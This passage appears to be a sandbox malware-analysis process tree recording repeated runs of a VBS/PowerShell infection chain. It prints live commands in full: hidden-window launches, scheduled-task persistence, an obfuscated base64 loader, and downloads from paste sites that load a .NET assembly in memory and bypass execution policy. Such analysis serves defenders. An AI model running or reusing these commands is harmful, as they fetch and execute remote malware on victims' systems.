    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:1140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:6080
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:5676
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5540
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4904
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5840
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4748
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:6048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:4564
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:4816
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:4504
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5612
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3968
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:3080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:3816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:1276
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:3296
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:4912
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:1632
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:6088
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4484
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★